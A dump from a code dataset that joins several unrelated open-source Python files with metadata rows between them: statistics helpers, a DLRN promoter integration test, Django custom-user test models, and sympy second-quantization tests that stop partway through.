"""Initializes a Beta distribution."""
self.alpha = alpha
self.beta = beta
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Beta distribution.
data: pair of int (heads, tails)
"""
heads, tails = data
self.alpha += heads
self.beta += tails
def Mean(self):
"""Computes the mean of this distribution."""
return self.alpha / (self.alpha + self.beta)
def Random(self):
"""Generates a random variate from this distribution."""
return random.betavariate(self.alpha, self.beta)
def Sample(self, n):
"""Generates a random sample from this distribution.
n: int sample size
"""
size = n,
return np.random.beta(self.alpha, self.beta, size)
def EvalPdf(self, x):
"""Evaluates the PDF at x."""
return x ** (self.alpha - 1) * (1 - x) ** (self.beta - 1)
def MakePmf(self, steps=101, label=None):
"""Returns a Pmf of this distribution.
Note: Normally, we just evaluate the PDF at a sequence
of points and treat the probability density as a probability
mass.
But if alpha or beta is less than one, we have to be
more careful because the PDF goes to infinity at x=0
and x=1. In that case we evaluate the CDF and compute
differences.
"""
if self.alpha < 1 or self.beta < 1:
cdf = self.MakeCdf()
pmf = cdf.MakePmf()
return pmf
xs = [i / (steps - 1.0) for i in range(steps)]
probs = [self.EvalPdf(x) for x in xs]
pmf = Pmf(dict(zip(xs, probs)), label=label)
return pmf
def MakeCdf(self, steps=101):
"""Returns the CDF of this distribution."""
xs = [i / (steps - 1.0) for i in range(steps)]
ps = [special.betainc(self.alpha, self.beta, x) for x in xs]
cdf = Cdf(xs, ps)
return cdf
class Dirichlet(object):
"""Represents a Dirichlet distribution.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
"""
def __init__(self, n, conc=1, label=None):
"""Initializes a Dirichlet distribution.
n: number of dimensions
conc: concentration parameter (smaller yields more concentration)
label: string label
"""
if n < 2:
raise ValueError('A Dirichlet distribution with '
'n<2 makes no sense')
self.n = n
self.params = np.ones(n, dtype=np.float) * conc
self.label = label if label is not None else '_nolegend_'
def Update(self, data):
"""Updates a Dirichlet distribution.
data: sequence of observations, in order corresponding to params
"""
m = len(data)
self.params[:m] += data
def Random(self):
"""Generates a random variate from this distribution.
Returns: normalized vector of fractions
"""
p = np.random.gamma(self.params)
return p / p.sum()
def Likelihood(self, data):
"""Computes the likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float probability
"""
m = len(data)
if self.n < m:
return 0
x = data
p = self.Random()
q = p[:m] ** x
return q.prod()
def LogLikelihood(self, data):
"""Computes the log likelihood of the data.
Selects a random vector of probabilities from this distribution.
Returns: float log probability
"""
m = len(data)
if self.n < m:
return float('-inf')
x = self.Random()
y = np.log(x[:m]) * data
return y.sum()
def MarginalBeta(self, i):
"""Computes the marginal distribution of the ith element.
See http://en.wikipedia.org/wiki/Dirichlet_distribution
#Marginal_distributions
i: int
Returns: Beta object
"""
alpha0 = self.params.sum()
alpha = self.params[i]
return Beta(alpha, alpha0 - alpha)
def PredictivePmf(self, xs, label=None):
"""Makes a predictive distribution.
xs: values to go into the Pmf
Returns: Pmf that maps from x to the mean prevalence of x
"""
alpha0 = self.params.sum()
ps = self.params / alpha0
return Pmf(zip(xs, ps), label=label)
def BinomialCoef(n, k):
"""Compute the binomial coefficient "n choose k".
n: number of trials
k: number of successes
Returns: float
"""
return scipy.misc.comb(n, k)
def LogBinomialCoef(n, k):
"""Computes the log of the binomial coefficient.
http://math.stackexchange.com/questions/64716/
approximating-the-logarithm-of-the-binomial-coefficient
n: number of trials
k: number of successes
Returns: float
"""
return n * math.log(n) - k * math.log(k) - (n - k) * math.log(n - k)
def NormalProbability(ys, jitter=0.0):
"""Generates data for a normal probability plot.
ys: sequence of values
jitter: float magnitude of jitter added to the ys
returns: numpy arrays xs, ys
"""
n = len(ys)
xs = np.random.normal(0, 1, n)
xs.sort()
if jitter:
ys = Jitter(ys, jitter)
else:
ys = np.array(ys)
ys.sort()
return xs, ys
def Jitter(values, jitter=0.5):
"""Jitters the values by adding a uniform variate in (-jitter, jitter).
values: sequence
jitter: scalar magnitude of jitter
returns: new numpy array
"""
n = len(values)
return np.random.uniform(-jitter, +jitter, n) + values
def NormalProbabilityPlot(sample, fit_color='0.8', **options):
"""Makes a normal probability plot with a fitted line.
sample: sequence of numbers
fit_color: color string for the fitted line
options: passed along to Plot
"""
xs, ys = NormalProbability(sample)
mean, var = MeanVar(sample)
std = math.sqrt(var)
fit = FitLine(xs, mean, std)
thinkplot.Plot(*fit, color=fit_color, label='model')
xs, ys = NormalProbability(sample)
thinkplot.Plot(xs, ys, **options)
def Mean(xs):
"""Computes mean.
xs: sequence of values
returns: float mean
"""
return np.mean(xs)
def Var(xs, mu=None, ddof=0):
"""Computes variance.
xs: sequence of values
mu: option known mean
ddof: delta degrees of freedom
returns: float
"""
xs = np.asarray(xs)
if mu is None:
mu = xs.mean()
ds = xs - mu
return np.dot(ds, ds) / (len(xs) - ddof)
def Std(xs, mu=None, ddof=0):
"""Computes standard deviation.
xs: sequence of values
mu: option known mean
ddof: delta degrees of freedom
returns: float
"""
var = Var(xs, mu, ddof)
return math.sqrt(var)
def MeanVar(xs, ddof=0):
"""Computes mean and variance.
Based on http://stackoverflow.com/questions/19391149/
numpy-mean-and-variance-from-single-function
xs: sequence of values
ddof: delta degrees of freedom
returns: pair of float, mean and var
"""
xs = np.asarray(xs)
mean = xs.mean()
s2 = Var(xs, mean, ddof)
return mean, s2
def Trim(t, p=0.01):
"""Trims the largest and smallest elements of t.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
sequence of values
"""
n = int(p * len(t))
t = sorted(t)[n:-n]
return t
def TrimmedMean(t, p=0.01):
"""Computes the trimmed mean of a sequence of numbers.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
return Mean(t)
def TrimmedMeanVar(t, p=0.01):
"""Computes the trimmed mean and variance of a sequence of numbers.
Side effect: sorts the list.
Args:
t: sequence of numbers
p: fraction of values to trim off each end
Returns:
float
"""
t = Trim(t, p)
mu, var = MeanVar(t)
return mu, var
def CohenEffectSize(group1, group2):
"""Compute Cohen's d.
group1: Series or NumPy array
group2: Series or NumPy array
returns: float
"""
diff = group1.mean() - group2.mean()
n1, n2 = len(group1), len(group2)
var1 = group1.var()
var2 = group2.var()
pooled_var = (n1 * var1 + n2 * var2) / (n1 + n2)
d = diff / math.sqrt(pooled_var)
return d
def Cov(xs, ys, meanx=None, meany=None):
"""Computes Cov(X, Y).
Args:
xs: sequence of values
ys: sequence of values
meanx: optional float mean of xs
meany: optional float mean of ys
Returns:
Cov(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
if meanx is None:
meanx = np.mean(xs)
if meany is None:
meany = np.mean(ys)
cov = np.dot(xs-meanx, ys-meany) / len(xs)
return cov
def Corr(xs, ys):
"""Computes Corr(X, Y).
Args:
xs: sequence of values
ys: sequence of values
Returns:
Corr(X, Y)
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
meanx, varx = MeanVar(xs)
meany, vary = MeanVar(ys)
corr = Cov(xs, ys, meanx, meany) / math.sqrt(varx * vary)
return corr
def SerialCorr(series, lag=1):
"""Computes the serial correlation of a series.
series: Series
lag: integer number of intervals to shift
returns: float correlation
"""
xs = series[lag:]
ys = series.shift(lag)[lag:]
corr = Corr(xs, ys)
return corr
def SpearmanCorr(xs, ys):
"""Computes Spearman's rank correlation.
Args:
xs: sequence of values
ys: sequence of values
Returns:
float Spearman's correlation
"""
xranks = pandas.Series(xs).rank()
yranks = pandas.Series(ys).rank()
return Corr(xranks, yranks)
def MapToRanks(t):
"""Returns a list of ranks corresponding to the elements in t.
Args:
t: sequence of numbers
Returns:
list of integer ranks, starting at 1
"""
# pair up each value with its index
pairs = enumerate(t)
# sort by value
sorted_pairs = sorted(pairs, key=itemgetter(1))
# pair up each pair with its rank
ranked = enumerate(sorted_pairs)
# sort by index
resorted = sorted(ranked, key=lambda trip: trip[1][0])
# extract the ranks
ranks = [trip[0]+1 for trip in resorted]
return ranks
def LeastSquares(xs, ys):
"""Computes a linear least squares fit for ys as a function of xs.
Args:
xs: sequence of values
ys: sequence of values
Returns:
tuple of (intercept, slope)
"""
meanx, varx = MeanVar(xs)
meany = Mean(ys)
slope = Cov(xs, ys, meanx, meany) / varx
inter = meany - slope * meanx
return inter, slope
def FitLine(xs, inter, slope):
"""Fits a line to the given data.
xs: sequence of x
returns: tuple of numpy arrays (sorted xs, fit ys)
"""
fit_xs = np.sort(xs)
fit_ys = inter + slope * fit_xs
return fit_xs, fit_ys
def Residuals(xs, ys, inter, slope):
"""Computes residuals for a linear fit with parameters inter and slope.
Args:
xs: independent variable
ys: dependent variable
inter: float intercept
slope: float slope
Returns:
list of residuals
"""
xs = np.asarray(xs)
ys = np.asarray(ys)
res = ys - (inter + slope * xs)
return res
def CoefDetermination(ys, res):
"""Computes the coefficient of determination (R^2) for given residuals.
Args:
ys: dependent variable
res: residuals
Returns:
float coefficient of determination
"""
return 1 - Var(res) / Var(ys)
def CorrelatedGenerator(rho):
"""Generates standard normal variates with serial correlation.
rho: target coefficient of correlation
Returns: iterable
"""
x = random.gauss(0, 1)
yield x
sigma = math.sqrt(1 - rho**2)
while True:
x = random.gauss(x * rho, sigma)
yield x
def CorrelatedNormalGenerator(mu, sigma, rho):
"""Generates normal variates with serial correlation.
mu: mean of variate
sigma: standard deviation of variate
rho: target coefficient of correlation
Returns: iterable
"""
for x in CorrelatedGenerator(rho):
yield x * sigma + mu
def RawMoment(xs, k):
"""Computes the kth raw moment of xs.
"""
return sum(x**k for x in xs) / len(xs)
def CentralMoment(xs, k):
"""Computes the kth central moment of xs.
"""
mean = RawMoment(xs, 1)
return sum((x - mean)**k for x in xs) / len(xs)
def StandardizedMoment(xs, k):
"""Computes the kth standardized moment of xs.
"""
var = CentralMoment(xs, 2)
std = math.sqrt(var)
return CentralMoment(xs, k) / std**k
def Skewness(xs):
"""Computes skewness.
"""
return StandardizedMoment(xs, 3)
def Median(xs):
"""Computes the median (50th percentile) of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: float
"""
cdf = Cdf(xs)
return cdf.Value(0.5)
def IQR(xs):
"""Computes the interquartile of a sequence.
xs: sequence or anything else that can initialize a Cdf
returns: pair of floats
"""
cdf = Cdf(xs)
return cdf.Value(0.25), cdf.Value(0.75)
def PearsonMedianSkewness(xs):
"""Computes the Pearson median skewness.
"""
median = Median(xs)
mean = RawMoment(xs, 1)
var = CentralMoment(xs, 2)
std = math.sqrt(var)
gp = 3 * (mean - median) / std
return gp
class FixedWidthVariables(object):
"""Represents a set of variables in a fixed width file."""
def __init__(self, variables, index_base=0):
"""Initializes.
variables: DataFrame
index_base: are the indices 0 or 1 based?
Attributes:
colspecs: list of (start, end) index tuples
names: list of string variable names
"""
self.variables = variables
# note: by default, subtract 1 from colspecs
self.colspecs = variables[['start', 'end']] - index_base
# convert colspecs to a list of pair of int
self.colspecs = self.colspecs.astype(np.int).values.tolist()
self.names = variables['name']
def ReadFixedWidth(self, filename, **options):
"""Reads a fixed width ASCII file.
filename: string filename
returns: DataFrame
"""
df = pandas.read_fwf(filename,
colspecs=self.colspecs,
names=self.names,
**options)
return df
def ReadStataDct(dct_file, **options):
"""Reads a Stata dictionary file.
dct_file: string filename
options: dict of options passed to open()
returns: FixedWidthVariables object
"""
type_map = dict(byte=int, int=int, long=int, float=float, double=float)
var_info = []
for line in open(dct_file, **options):
match = re.search( r'_column\(([^)]*)\)', line)
if match:
start = int(match.group(1))
t = line.split()
vtype, name, fstring = t[1:4]
name = name.lower()
if vtype.startswith('str'):
vtype = str
else:
vtype = type_map[vtype]
long_desc = ' '.join(t[4:]).strip('"')
var_info.append((start, vtype, name, fstring, long_desc))
columns = ['start', 'type', 'name', 'fstring', 'desc']
variables = pandas.DataFrame(var_info, columns=columns)
# fill in the end column by shifting the start column
variables['end'] = variables.start.shift(-1)
variables.loc[len(variables)-1, 'end'] = 0
dct = FixedWidthVariables(variables, index_base=1)
return dct
def Resample(xs, n=None):
"""Draw a sample from xs with the same length as xs.
xs: sequence
n: sample size (default: len(xs))
returns: NumPy array
"""
if n is None:
n = len(xs)
return np.random.choice(xs, n, replace=True)
def SampleRows(df, nrows, replace=False):
"""Choose a sample of rows from a DataFrame.
df: DataFrame
nrows: number of rows
replace: whether to sample with replacement
returns: DataDf
"""
indices = np.random.choice(df.index, nrows, replace=replace)
sample = df.loc[indices]
return sample
def ResampleRows(df):
"""Resamples rows from a DataFrame.
df: DataFrame
returns: DataFrame
"""
return SampleRows(df, len(df), replace=True)
def ResampleRowsWeighted(df, column='finalwgt'):
"""Resamples a DataFrame using probabilities proportional to given column.
df: DataFrame
column: string column name to use as weights
returns: DataFrame
"""
weights = df[column]
cdf = Cdf(dict(weights))
indices = cdf.Sample(len(weights))
sample = df.loc[indices]
return sample
def PercentileRow(array, p):
"""Selects the row from a sorted array that maps to percentile p.
p: float 0--100
returns: NumPy array (one row)
"""
rows, cols = array.shape
index = int(rows * p / 100)
return array[index,]
def PercentileRows(ys_seq, percents):
"""Given a collection of lines, selects percentiles along vertical axis.
For example, if ys_seq contains simulation results like ys as a
function of time, and percents contains (5, 95), the result would
be a 90% CI for each vertical slice of the simulation results.
ys_seq: sequence of lines (y values)
percents: list of percentiles (0-100) to select
returns: list of NumPy arrays, one for each percentile
"""
nrows = len(ys_seq)
ncols = len(ys_seq[0])
array = np.zeros((nrows, ncols))
for i, ys in enumerate(ys_seq):
array[i,] = ys
array = np.sort(array, axis=0)
rows = [PercentileRow(array, p) for p in percents]
return rows
def Smooth(xs, sigma=2, **options):
"""Smooths a NumPy array with a Gaussian filter.
xs: sequence
sigma: standard deviation of the filter
"""
return ndimage.filters.gaussian_filter1d(xs, sigma, **options)
class HypothesisTest(object):
"""Represents a hypothesis test."""
def __init__(self, data):
"""Initializes.
data: data in whatever form is relevant
"""
self.data = data
self.MakeModel()
self.actual = self.TestStatistic(data)
self.test_stats = None
self.test_cdf = None
def PValue(self, iters=1000):
"""Computes the distribution of the test statistic and p-value.
iters: number of iterations
returns: float p-value
"""
self.test_stats = [self.TestStatistic(self.RunModel())
for _ in range(iters)]
self.test_cdf = Cdf(self.test_stats)
count = sum(1 for x in self.test_stats if x >= self.actual)
return count / iters
def MaxTestStat(self):
"""Returns the largest test statistic seen during simulations.
"""
return max(self.test_stats)
def PlotCdf(self, label=None):
"""Draws a Cdf with vertical lines at the observed test stat.
"""
def VertLine(x):
"""Draws a vertical line at x."""
thinkplot.Plot([x, x], [0, 1], color='0.8')
VertLine(self.actual)
thinkplot.Cdf(self.test_cdf, label=label)
def TestStatistic(self, data):
"""Computes the test statistic.
data: data in whatever form is relevant
"""
raise UnimplementedMethodException()
def MakeModel(self):
"""Build a model of the null hypothesis.
"""
pass
def RunModel(self):
"""Run the model of the null hypothesis.
returns: simulated data
"""
raise UnimplementedMethodException()
def main():
pass
if __name__ == '__main__':
main()
| mit | 1,973,675,057,824,859,000 | 23.589324 | 79 | 0.577964 | false |
redhat-openstack/rdo-infra | ci-scripts/dlrnapi_promoter/test_dlrn_integration.py | 1 | 6534 | """
This test is launched as part of the existing tox command
It tests if promoter and dlrn server are interacting correctly
Uses standard pytest fixture as a setup/teardown method
"""
import logging
import os
import promoter_integration_checks
import pytest
import yaml
from common import close_logging
from config_legacy import PromoterLegacyConfig
try:
import urllib2 as url
except ImportError:
import urllib.request as url
from dlrn_hash import DlrnAggregateHash, DlrnCommitDistroHash, DlrnHash
from dlrnapi_client.rest import ApiException
from logic import Promoter
from stage import main as stage_main
@pytest.fixture(scope='function', params=['dlrn_legacyconf_single',
'dlrn_legacyconf_integration'])
def staged_env(request):
"""
Fixture that runs the staging environment provisioner with parameters,
yield the stage_info file produced and cleans up after
It has two parameters by default, to test the interaction for single
pipeline and for integration pipeline
:return: yields the stage_info dict
"""
close_logging("promoter-staging")
close_logging("promoter")
log = logging.getLogger('promoter-staging')
setup_cmd_line = ""
teardown_cmd_line = ""
# We are going to call the main in the staging passing a composed command
# line, so we are testing also that the argument parsing is working
# correctly instead of passing configuration directly
release_config = \
"CentOS-7/master.yaml"
promoter_config_file = "staging/CentOS-7/master.ini"
setup_cmd_line += " --scenes dlrn"
try:
test_case = request.param
except AttributeError:
pass
except KeyError:
log.error("Invalid test case '{}'".format(request.param))
raise
# for the tests of the integration pipeline we need to pass a different
# file with db data
if "_integration" in test_case:
release_config = \
"CentOS-8/master.yaml"
promoter_config_file = \
"staging/CentOS-8/master.ini"
setup_cmd_line += " --db-data-file integration-pipeline.yaml"
teardown_cmd_line += " --db-data-file integration-pipeline.yaml"
setup_cmd_line += " setup --release-config {}".format(release_config)
teardown_cmd_line += " teardown"
log.info("Running cmd line: {}".format(setup_cmd_line))
config = stage_main(setup_cmd_line)
stage_info_path = config['stage_info_path']
with open(stage_info_path, "r") as stage_info_file:
stage_info = yaml.safe_load(stage_info_file)
overrides = {
'log_file': stage_info['main']['log_file'],
'repo_url': stage_info['dlrn']['server']['repo_url'],
'allowed_clients': 'dlrn_client',
'config_file': promoter_config_file,
}
overrides_obj = type("FakeArgs", (), overrides)
os.environ["DLRNAPI_PASSWORD"] = stage_info['dlrn']['server']['password']
if 'legacyconf' in test_case:
config = PromoterLegacyConfig(overrides_obj.config_file,
overrides=overrides_obj)
else:
raise Exception("New config engine is not implemented yet")
promoter = Promoter(config)
yield stage_info, promoter
log.info("Running cmd line: {}".format(teardown_cmd_line))
stage_main(teardown_cmd_line)
@pytest.mark.serial
def test_dlrn_server(staged_env):
"""
General server testing, with a single promotion
:param staged_env: The staged env fixture
:return: None
"""
stage_info, promoter = staged_env
commit = stage_info['dlrn']['promotions']['promotion_candidate']
candidate_label = commit['name']
promote_name = stage_info['dlrn']['promotion_target']
repo_url = stage_info['dlrn']['server']['repo_url']
client = promoter.dlrn_client
dlrn_hash = DlrnHash(source=commit)
dlrn_hash.label = candidate_label
# TODO: Check db injection (needs sqlite3 import)
# Check we can access dlrnapi
try:
client.promote(dlrn_hash, promote_name,
candidate_label=candidate_label, create_previous=False)
assert True, "Dlrn api responding"
except ApiException as e:
msg = "Exception when calling DefaultApi->api_promote_post: %s\n" % e
assert False, msg
# Check if we can access repo_url and get the versions file
versions_url = os.path.join(repo_url, promote_name, 'versions.csv')
try:
url.urlopen(versions_url)
assert True, "Versions file found"
except IOError:
assert False, "No versions file generated"
@pytest.mark.serial
def test_select_candidates(staged_env):
"""
Testing the selection of candidates hashes after fetching them from
the server
:param staged_env: The staged env fixture
:param promoter: The promoter fixture
:return: None
"""
stage_info, promoter = staged_env
candidate_hashes_list = []
for target_label, candidate_label in \
promoter.config.promotion_steps_map.items():
candidate_hashes_list = promoter.select_candidates(candidate_label,
target_label)
assert candidate_hashes_list != []
if stage_info['main']['pipeline_type'] == "integration":
assert type(candidate_hashes_list[0]) == DlrnAggregateHash
elif stage_info['main']['pipeline_type'] == "single":
assert type(candidate_hashes_list[0]) == DlrnCommitDistroHash
def test_promote_all_links(staged_env):
"""
Testing the promotion of candidates inside promote_all_links, but limited
to the dlrn part
:param staged_env: The staged env fixture
:param promoter: The promoter fixture
:return: None
"""
stage_info, promoter = staged_env
promoted_pairs = promoter.promote_all()
for promoted_hash, label in promoted_pairs:
if stage_info['main']['pipeline_type'] == "single":
error_msg = "Single pipeline should promote a commit/distro hash"
assert type(promoted_hash) == DlrnCommitDistroHash, error_msg
elif stage_info['main']['pipeline_type'] == "integration":
error_msg = "Integration pipeline should promote an aggregate hash"
assert type(promoted_hash) == DlrnAggregateHash, error_msg
promoter_integration_checks.check_dlrn_promoted_hash(
stage_info=stage_info)
error_msg = "Nothing promoted, and checks failed to detect issues"
assert len(promoted_pairs) != 0, error_msg
| apache-2.0 | 3,242,506,652,930,499,000 | 33.389474 | 79 | 0.662687 | false |
diego-d5000/MisValesMd | env/lib/python2.7/site-packages/django/contrib/auth/tests/custom_user.py | 1 | 3775 | from django.contrib.auth.models import (
AbstractBaseUser, AbstractUser, BaseUserManager, Group, Permission,
PermissionsMixin, UserManager,
)
from django.db import models
# The custom User uses email as the unique identifier, and requires
# that every user provide a date of birth. This lets us test
# changes in username datatype, and non-text required fields.
class CustomUserManager(BaseUserManager):
def create_user(self, email, date_of_birth, password=None):
"""
Creates and saves a User with the given email and password.
"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(
email=self.normalize_email(email),
date_of_birth=date_of_birth,
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password, date_of_birth):
u = self.create_user(email, password=password, date_of_birth=date_of_birth)
u.is_admin = True
u.save(using=self._db)
return u
class CustomUser(AbstractBaseUser):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
date_of_birth = models.DateField()
custom_objects = CustomUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth']
class Meta:
app_label = 'auth'
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def __unicode__(self):
return self.email
# Maybe required?
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return set()
def has_perm(self, perm, obj=None):
return True
def has_perms(self, perm_list, obj=None):
return True
def has_module_perms(self, app_label):
return True
# Admin required fields
@property
def is_staff(self):
return self.is_admin
class RemoveGroupsAndPermissions(object):
"""
A context manager to temporarily remove the groups and user_permissions M2M
fields from the AbstractUser class, so they don't clash with the
related_name sets.
"""
def __enter__(self):
self._old_au_local_m2m = AbstractUser._meta.local_many_to_many
self._old_pm_local_m2m = PermissionsMixin._meta.local_many_to_many
groups = models.ManyToManyField(Group, blank=True)
groups.contribute_to_class(PermissionsMixin, "groups")
user_permissions = models.ManyToManyField(Permission, blank=True)
user_permissions.contribute_to_class(PermissionsMixin, "user_permissions")
PermissionsMixin._meta.local_many_to_many = [groups, user_permissions]
AbstractUser._meta.local_many_to_many = [groups, user_permissions]
def __exit__(self, exc_type, exc_value, traceback):
AbstractUser._meta.local_many_to_many = self._old_au_local_m2m
PermissionsMixin._meta.local_many_to_many = self._old_pm_local_m2m
# The extension user is a simple extension of the built-in user class,
# adding a required date_of_birth field. This allows us to check for
# any hard references to the name "User" in forms/handlers etc.
with RemoveGroupsAndPermissions():
class ExtensionUser(AbstractUser):
date_of_birth = models.DateField()
custom_objects = UserManager()
REQUIRED_FIELDS = AbstractUser.REQUIRED_FIELDS + ['date_of_birth']
class Meta:
app_label = 'auth'
| mit | -8,085,511,089,587,579,000 | 31.40708 | 88 | 0.647947 | false |
wxgeo/geophar | wxgeometrie/sympy/physics/tests/test_secondquant.py | 8 | 46268 | from sympy.physics.secondquant import (
Dagger, Bd, VarBosonicBasis, BBra, B, BKet, FixedBosonicBasis,
matrix_rep, apply_operators, InnerProduct, Commutator, KroneckerDelta,
AnnihilateBoson, CreateBoson, BosonicOperator,
F, Fd, FKet, BosonState, CreateFermion, AnnihilateFermion,
evaluate_deltas, AntiSymmetricTensor, contraction, NO, wicks,
PermutationOperator, simplify_index_permutations,
_sort_anticommuting_fermions, _get_ordered_dummies,
substitute_dummies
)
from sympy import (Dummy, expand, Function, I, Rational, simplify, sqrt, Sum,
Symbol, symbols)
from sympy.core.compatibility import range
from sympy.utilities.pytest import XFAIL, slow
from sympy.printing.latex import latex
def test_PermutationOperator():
p, q, r, s = symbols('p,q,r,s')
f, g, h, i = map(Function, 'fghi')
P = PermutationOperator
assert P(p, q).get_permuted(f(p)*g(q)) == -f(q)*g(p)
assert P(p, q).get_permuted(f(p, q)) == -f(q, p)
assert P(p, q).get_permuted(f(p)) == f(p)
expr = (f(p)*g(q)*h(r)*i(s)
- f(q)*g(p)*h(r)*i(s)
- f(p)*g(q)*h(s)*i(r)
+ f(q)*g(p)*h(s)*i(r))
perms = [P(p, q), P(r, s)]
assert (simplify_index_permutations(expr, perms) ==
P(p, q)*P(r, s)*f(p)*g(q)*h(r)*i(s))
def test_index_permutations_with_dummies():
a, b, c, d = symbols('a b c d')
p, q, r, s = symbols('p q r s', cls=Dummy)
f, g = map(Function, 'fg')
P = PermutationOperator
# No dummy substitution necessary
expr = f(a, b, p, q) - f(b, a, p, q)
assert simplify_index_permutations(
expr, [P(a, b)]) == P(a, b)*f(a, b, p, q)
# Cases where dummy substitution is needed
expected = P(a, b)*substitute_dummies(f(a, b, p, q))
expr = f(a, b, p, q) - f(b, a, q, p)
result = simplify_index_permutations(expr, [P(a, b)])
assert expected == substitute_dummies(result)
expr = f(a, b, q, p) - f(b, a, p, q)
result = simplify_index_permutations(expr, [P(a, b)])
assert expected == substitute_dummies(result)
# A case where nothing can be done
expr = f(a, b, q, p) - g(b, a, p, q)
result = simplify_index_permutations(expr, [P(a, b)])
assert expr == result
def test_dagger():
i, j, n, m = symbols('i,j,n,m')
assert Dagger(1) == 1
assert Dagger(1.0) == 1.0
assert Dagger(2*I) == -2*I
assert Dagger(Rational(1, 2)*I/3.0) == -Rational(1, 2)*I/3.0
assert Dagger(BKet([n])) == BBra([n])
assert Dagger(B(0)) == Bd(0)
assert Dagger(Bd(0)) == B(0)
assert Dagger(B(n)) == Bd(n)
assert Dagger(Bd(n)) == B(n)
assert Dagger(B(0) + B(1)) == Bd(0) + Bd(1)
assert Dagger(n*m) == Dagger(n)*Dagger(m) # n, m commute
assert Dagger(B(n)*B(m)) == Bd(m)*Bd(n)
assert Dagger(B(n)**10) == Dagger(B(n))**10
def test_operator():
i, j = symbols('i,j')
o = BosonicOperator(i)
assert o.state == i
assert o.is_symbolic
o = BosonicOperator(1)
assert o.state == 1
assert not o.is_symbolic
def test_create():
i, j, n, m = symbols('i,j,n,m')
o = Bd(i)
assert latex(o) == "b^\\dagger_{i}"
assert isinstance(o, CreateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = Bd(0)
assert o.apply_operator(BKet([n])) == sqrt(n + 1)*BKet([n + 1])
o = Bd(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_annihilate():
i, j, n, m = symbols('i,j,n,m')
o = B(i)
assert latex(o) == "b_{i}"
assert isinstance(o, AnnihilateBoson)
o = o.subs(i, j)
assert o.atoms(Symbol) == {j}
o = B(0)
assert o.apply_operator(BKet([n])) == sqrt(n)*BKet([n - 1])
o = B(n)
assert o.apply_operator(BKet([n])) == o*BKet([n])
def test_basic_state():
i, j, n, m = symbols('i,j,n,m')
s = BosonState([0, 1, 2, 3, 4])
assert len(s) == 5
assert s.args[0] == tuple(range(5))
assert s.up(0) == BosonState([1, 1, 2, 3, 4])
assert s.down(4) == BosonState([0, 1, 2, 3, 3])
for i in range(5):
assert s.up(i).down(i) == s
assert s.down(0) == 0
for i in range(5):
assert s[i] == i
s = BosonState([n, m])
assert s.down(0) == BosonState([n - 1, m])
assert s.up(0) == BosonState([n + 1, m])
@XFAIL
def test_move1():
i, j = symbols('i,j')
A, C = symbols('A,C', cls=Function)
o = A(i)*C(j)
# This almost works, but has a minus sign wrong
assert move(o, 0, 1) == KroneckerDelta(i, j) + C(j)*A(i)
@XFAIL
def test_move2():
i, j = symbols('i,j')
A, C = symbols('A,C', cls=Function)
o = C(j)*A(i)
# This almost works, but has a minus sign wrong
assert move(o, 0, 1) == -KroneckerDelta(i, j) + A(i)*C(j)
def test_basic_apply():
n = symbols("n")
e = B(0)*BKet([n])
assert apply_operators(e) == sqrt(n)*BKet([n - 1])
e = Bd(0)*BKet([n])
assert apply_operators(e) == sqrt(n + 1)*BKet([n + 1])
def test_complex_apply():
n, m = symbols("n,m")
o = Bd(0)*B(0)*Bd(1)*B(0)
e = apply_operators(o*BKet([n, m]))
answer = sqrt(n)*sqrt(m + 1)*(-1 + n)*BKet([-1 + n, 1 + m])
assert expand(e) == expand(answer)
def test_number_operator():
n = symbols("n")
o = Bd(0)*B(0)
e = apply_operators(o*BKet([n]))
assert e == n*BKet([n])
def test_inner_product():
i, j, k, l = symbols('i,j,k,l')
s1 = BBra([0])
s2 = BKet([1])
assert InnerProduct(s1, Dagger(s1)) == 1
assert InnerProduct(s1, s2) == 0
s1 = BBra([i, j])
s2 = BKet([k, l])
r = InnerProduct(s1, s2)
assert r == KroneckerDelta(i, k)*KroneckerDelta(j, l)
def test_symbolic_matrix_elements():
n, m = symbols('n,m')
s1 = BBra([n])
s2 = BKet([m])
o = B(0)
e = apply_operators(s1*o*s2)
assert e == sqrt(m)*KroneckerDelta(n, m - 1)
def test_matrix_elements():
b = VarBosonicBasis(5)
o = B(0)
m = matrix_rep(o, b)
for i in range(4):
assert m[i, i + 1] == sqrt(i + 1)
o = Bd(0)
m = matrix_rep(o, b)
for i in range(4):
assert m[i + 1, i] == sqrt(i + 1)
@slow
def test_sho():
n, m = symbols('n,m')
h_n = Bd(n)*B(n)*(n + Rational(1, 2))
H = Sum(h_n, (n, 0, 5))
o = H.doit(deep=False)
b = FixedBosonicBasis(2, 6)
m = matrix_rep(o, b)
# We need to double check these energy values to make sure that they
# are correct and have the proper degeneracies!
diag = [1, 2, 3, 3, 4, 5, 4, 5, 6, 7, 5, 6, 7, 8, 9, 6, 7, 8, 9, 10, 11]
for i in range(len(diag)):
assert diag[i] == m[i, i]
def test_commutation():
n, m = symbols("n,m", above_fermi=True)
c = Commutator(B(0), Bd(0))
assert c == 1
c = Commutator(Bd(0), B(0))
assert c == -1
c = Commutator(B(n), Bd(0))
assert c == KroneckerDelta(n, 0)
c = Commutator(B(0), Bd(0))
e = simplify(apply_operators(c*BKet([n])))
assert e == BKet([n])
c = Commutator(B(0), B(1))
e = simplify(apply_operators(c*BKet([n, m])))
assert e == 0
c = Commutator(F(m), Fd(m))
assert c == +1 - 2*NO(Fd(m)*F(m))
c = Commutator(Fd(m), F(m))
assert c.expand() == -1 + 2*NO(Fd(m)*F(m))
C = Commutator
X, Y, Z = symbols('X,Y,Z', commutative=False)
assert C(C(X, Y), Z) != 0
